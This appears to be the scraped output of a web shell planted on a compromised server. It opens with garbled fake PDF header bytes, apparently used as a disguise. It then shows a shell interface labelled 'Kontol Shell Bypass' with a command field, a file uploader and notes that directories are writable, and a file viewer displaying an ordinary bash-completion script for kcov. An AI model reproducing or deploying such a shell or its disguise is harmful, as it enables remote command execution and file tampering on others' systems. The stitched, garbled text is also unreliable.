%PDF- <> %âãÏÓ endobj 2 0 obj <> endobj 3 0 obj <>/ExtGState<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/Annots[ 28 0 R 29 0 R] /MediaBox[ 0 0 595.5 842.25] /Contents 4 0 R/Group<>/Tabs/S>> endobj ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<> endobj 2 0 obj<>endobj 2 0 obj<>es 3 0 R>> endobj 2 0 obj<> ox[ 0.000000 0.000000 609.600000 935.600000]/Fi endobj 3 0 obj<> endobj 7 1 obj<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI]>>/Subtype/Form>> stream

nadelinn - rinduu

Command :

ikan Uploader :
Directory :  /snap/core22/current/usr/share/bash-completion/completions/
Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 
Current File : //snap/core22/current/usr/share/bash-completion/completions/kcov
# kcov(1) completion                                       -*- shell-script -*-

_kcov()
{
    local cur prev words cword split
    _init_completion -s -n : || return

    case "$prev" in
        --pid | -p)
            _pids
            return
            ;;
        --sort-type | -s)
            COMPREPLY=($(compgen -W 'filename percent reverse lines
                uncovered' -- "$cur"))
            return
            ;;
        --include-path | --exclude-path)
            _filedir
            return
            ;;
        --replace-src-path)
            if [[ $cur == ?*:* ]]; then
                cur="${cur##*:}"
                _filedir
            else
                _filedir
                compopt -o nospace
            fi
            return
            ;;
        --limits | -l)
            if [[ $cur == ?*,* ]]; then
                prev="${cur%,*}"
                cur="${cur##*,}"
                COMPREPLY=($(compgen -W "{0..100}" -- "$cur"))
                ((${#COMPREPLY[@]} == 1)) &&
                    COMPREPLY=(${COMPREPLY/#/$prev,})
            else
                COMPREPLY=($(compgen -W "{0..100}" -- "$cur"))
                ((${#COMPREPLY[@]} == 1)) && COMPREPLY=(${COMPREPLY/%/,})
                compopt -o nospace
            fi
            return
            ;;
        --title | -t | --include-pattern | --exclude-pattern | --path-strip-level)
            # argument required but no completions available
            return
            ;;
    esac

    $split && return

    if [[ $cur == -* ]]; then
        COMPREPLY=($(compgen -W '$(_parse_help "$1" --help)' -- "$cur"))
        [[ ${COMPREPLY-} == *= ]] && compopt -o nospace
        return
    fi

    _filedir
} &&
    complete -F _kcov kcov

# ex: filetype=sh

Kontol Shell Bypass